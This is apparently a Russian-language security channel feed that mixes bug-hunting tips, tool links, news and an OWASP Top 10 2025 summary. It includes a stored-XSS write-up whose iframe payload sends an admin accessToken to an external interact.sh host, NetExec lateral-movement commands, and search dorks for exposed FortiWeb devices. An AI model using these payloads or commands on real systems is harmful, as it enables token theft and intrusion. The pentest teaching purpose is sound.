Fsecurity | HH

🕷 Чек-лист для поиска IDOR IDOR — один из самых распространенных и простых багов. Но знаешь ли ты все фазы тестирования, после которых с уверенностью можно сказать «Здесь нет IDOR»? Разобрали первую фазу, а остальные — в чек-листе ⬅️ 1️⃣ Подготовка и идентификация целей ✅Создай тестовые аккаунты: заведи два профиля — чтобы безопасно проверять операции, изменяющие состояние (POST/PUT/DELETE). ✅Поиск API: определи JSON-эндпоинты, которые используются под капотом отрендеренного HTML. ✅Поиск чувствительных операций: в первую очередь проверяй критичные фичи — сброс пароля, восстановление доступа, финансовые операции, личные сообщения, управление пользователями. ✅Проверяй каждый ID: выясни, является ли эндпоинт приватным или публичным и содержит ли он ID-параметры любого типа. ✅Утечки идентификаторов: проверь, не раскрываются ли ID через другие API-эндпоинты или публичные страницы (публичные профили, списки). ✅Полная карта клиентов: собери все источники запросов — веб, мобильные приложения, публичные/скрытые API. Для мобилок — извлеки запросы из декомпилированного приложения. Если есть swagger/openapi — добавь их в карту.

🔗Ссылка: https://habr.com/ru/companies/tomhunter/articles/966568/

🔗Ссылка: https://github.com/ring0lab/catphish

HTML Injection → Stored XSS → Hijack accessToken Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации. Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов. Решил проверить — вставил простой HTML:

<h1>Test</h1>    <!-- изменение размера шрифта -->

Текст стал крупнее — значит innerHTML или подобная конструкция. Далее потестировал теги:

<img src="x">    <!-- битая картинка -->
<input>          <!-- лишний input на странице -->

Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу ➡️ отображается в админке ➡️ возникает вопрос: можно ли это раскрутить до XSS? ➡️ Рабочий XSS-пэйлоад:

<iframe src="javascript:alert(localStorage.accessToken)"></iframe>

В данном случае он читает токен из localStorage и вызывает alert() с его значением. Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой. ➡️ Эскалация XSS:

<iframe src="javascript:fetch('//your.interact.sh?token=' + localStorage.accessToken)"></iframe>

Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена. Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта. ➡️ Особенность уязвимости теги:

🔴Инъекция сохраняется в БД (Stored) 🔴Отрабатывает на стороне администратора 🔴Через XSS читается accessToken из localStorage

➡️ Что это даёт:

🔴

Захват токена администратора

🔴

Возможность делать запросы от его имени

🔴

Потенциальный full access к admin-панели

➡️ Советы для тестирования:

🔴

Ищите HTML-теги, которые влияют на DOM (текст, форма, медиа)

🔴

Проверяйте innerHTML, outerHTML, dangerouslySetInnerHTML в React

🔴

Тестируйте на img, input, iframe, svg, math, script и template

🔴

Не ограничивайтесь alert(1), пробуйте localStorage, fetch, document.cookie, navigator, location

🔴

Используйте Interactsh, Burp Collaborator, xsshunter для подтверждения уязвимости

🔗Ссылка: https://opennet.ru/64257/

Invoke-PowerChrome 🌐 Invoke-PowerChrome - скрипт для сбора и декрипта паролей из браузеров (Chrome, Edge) написанный на PowerShell. Хорошо подойдет для поиска дополнительных учеток, если уже есть права локального администратора 😃 Сам модуль будет интегрирован в PsMapExec для удаленного сбора паролей с хостов 😎

A PowerShell script for decrypting Chromium-based browser passwords, supporting both v10 (DPAPI user) and Google Chrome v20 (App Bound Encryption) encrypted blobs. The script dynamically interacts with Windows cryptographic APIs to decrypt passwords without external dependencies and can be executed in memory.

💻 Github: https://github.com/The-Viper-One/Invoke-PowerChrome 🧢 s0ld13r

🔗Ссылка: https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

🔗Ссылка: https://hunt.io/blog/guide-hunting-cobalt-strike-part-1-open-directories

NetExec в реальной работе: когда инструмент не мешает, а помогает

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону

Если честно, большинство тулов по боковой разведке в Windows-сетях либо слишком громоздкие, либо очень шумные, либо требуют больше внимания к себе, чем к инфраструктуре. NetExec выигрывает потому, что ведёт себя предельно приземлённо. Его удобно запускать прямо в момент, когда нужно «прощупать» живые хосты, проверить валидность учётки или понять, куда вообще есть дорога. Например, когда получаешь пару доменных логинов и пытаешься выяснить, насколько далеко они тебя пустят, достаточно выполнить что-то вроде:

nxc smb 10.10.0.0/24 -u user -p pass

Без особых танцев он покажет онлайн-хосты, статусы логонов и где возможен дальнейший доступ. Быстрая доменная разведка: зачем усложнять то, что можно сделать одной командой 😑 Здесь NetExec экономит время, потому что умеет выгружать нужную информацию сам, без лишних телодвижений.

nxc ldap 10.10.0.1 -d domain.local -u redblue -p password -k --bloodhound -ns 10.10.0.1 -c All

Такая команда закрывает потребность в первичной доменной разведке целиком. Она удобно работает прямо с Red Team-контейнеров, с Linux-боксов в инфраструктуре и даже с имплантов на отдалённых хостах, если есть стабильный канал. В бою это критично: чем меньше прыгаешь между утилитами — тем меньше вероятность ошибиться и оставлять лишние следы. Проверка уязвимых сервисов: та самая простота, которая экономит часы 🧛 Разведка редко ограничивается только «кто жив» и «какие группы есть в домене». Нередко нужно быстро проверить известные уязвимости или кривые конфигурации, и вот тут флаг -M реально выручает. Когда прилетает задача убедиться, что контроллер домена не подвержен ZeroLogon, достаточно выполнить

nxc smb dc01.domain.local -u user -p pass -M zerologon

И сразу получить чёткий ответ, без установки отдельного PoC и без риска перепутать параметры. С принтайтмерами ситуация похожая:

nxc smb 10.10.0.5 -M printnightmare

сразу покажет, есть ли шанс на дальнейшую эксплуатацию. Это выглядит почти лениво, но правде в глаза — скорость здесь стоит куда дороже «чистоты» инструментов. Когда инструмент работает на тебя 👨‍💻 В операциях ценится не только функциональность, но и предсказуемость. NetExec ведёт себя стабильно и одинаково с любых позиций: будь то Kali, Commando VM, обычный Ubuntu-бокс в сети заказчика или VPS-посредник (не надо блечить пожалуйста), через который идёт туннелирование. Его приятно использовать как средство бокового перемещения по SMB, WinRM или MSSQL. Например, WinRM-доступ можно быстро проверить командой

nxc winrm targets.txt -u admin -p pass

и сразу понять, где можно закрепиться или выполнить удалённый PowerShell. Он одинаково полезен и на этапах красной команды, и в пентестах, и даже в балках синей команды, когда нужно быстро воспроизвести технику атакующих. NetExec — это чумовой инструмент 🤹 Нет пафоса, нет лишнего шума. Это просто утилита, которую удобно использовать. Она не закрывает все задачи мира, но отлично помогает ориентироваться в Windows-сетях, искать точки входа, проверять уязвимости и собирать доменную разведку без плясок с инструментарием. И чем больше работаешь в живых сетях, тем больше понимаешь: иногда инструмент должен быть не «крутым», а просто нормальным, человеческим, удобным. Именно таким и ощущается NetExec. Подписывайтесь на канал, дальше больше!

🔗Ссылка: https://labex.io/ru/tutorials/nmap-ftp-enumeration-and-anonymous-access-596696

🔗Ссылка: https://opennet.ru/64231/

🔗Ссылка: https://github.com/techchipnet/CamPhish

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Fortinet 0day An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication. Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/ Dork: ZoomEye Dork: app="FortiWeb" HUNTER: product.name="FortiWeb"

🔗Ссылка: https://habr.com/ru/companies/pt/articles/963094/

Когда ты дежурный аналитик SOC, а упала сеть или источники событий - а SIEM-инженеры или сетевики с руководством работают четко по графику…

🔗Ссылка; https://habr.com/ru/articles/956174/

🔗Ссылка: https://github.com/Octoberfest7/TeamsPhisher

🔗 Ссылка: https://www.securitylab.ru/news/565967.php?r=1

Наконец-то OWASP Top 10 подаёт признаки жизни - выпустили релиз кандидат топа веб уязвимостей. Коротко по изменениям: ○ A01:2025 Broken Access Control – Данный вид уязвимостей остаётся на первом месте. Вдобавок к этому пункту теперь относятся ещё SSRF уязвимости, которые были на 10-м месте топа 2021-го года. ○ A02:2025 Security Misconfiguration – Проблемы мисконфигурации стали встречаться чаще, поэтому уязвимость перенесена с 5-го места на 2-е. ○ A03:2025 Software Supply Chain Failures – Это расширенная версия A06:2021-Vulnerable and Outdated Components. В эту категорию добавились угрозы цепочки поставок. ○ A04:2025 Cryptographic Failures – Концептуальных изменения в этой категории нет, она переместилась со 2-го места на 4-е. ○ A05:2025 Injection – Эта категория также не претерпела серьёзных изменений. Она сместилась с 3-го места на 5-е. ○ A06:2025 Insecure Design – В данной категории также стало встречаться меньше уязвимостей, поэтому она сместилась с 4-го места на 6-е. ○ A07:2025 Authentication Failures – Данная категория заменяет собой A07:2021-Identification and Authentication Failures. В остальном концептуально ничего не поменялась, все угрозы связаны с аутентификацией. ○ A08:2025 Software or Data Integrity Failures – Категория повторяет аналогичный пункт из прошлого топа A08:2021-Software and Data Integrity Failures. ○ A09:2025 Logging & Alerting Failures – Также как и в 7-м пункте топа, у этой категории слегка изменено название. В остальном значительных изменений нет. ○ A10:2025 Mishandling of Exceptional Conditions – Полностью новая категория, которая концентрируется на некорректной обработке исключений, приводящей к сбою в системе. К этому пункту относятся логические баги, случаи переполнения буфера, состояния гонки и т.д. Более подробно документ можно изучить тут. Финальный релиз списка запланирован на 20-е ноября. 🧠 Твой Пакет Знаний | 👨‍🏫 Менторство ИБ 📂 Другие каналы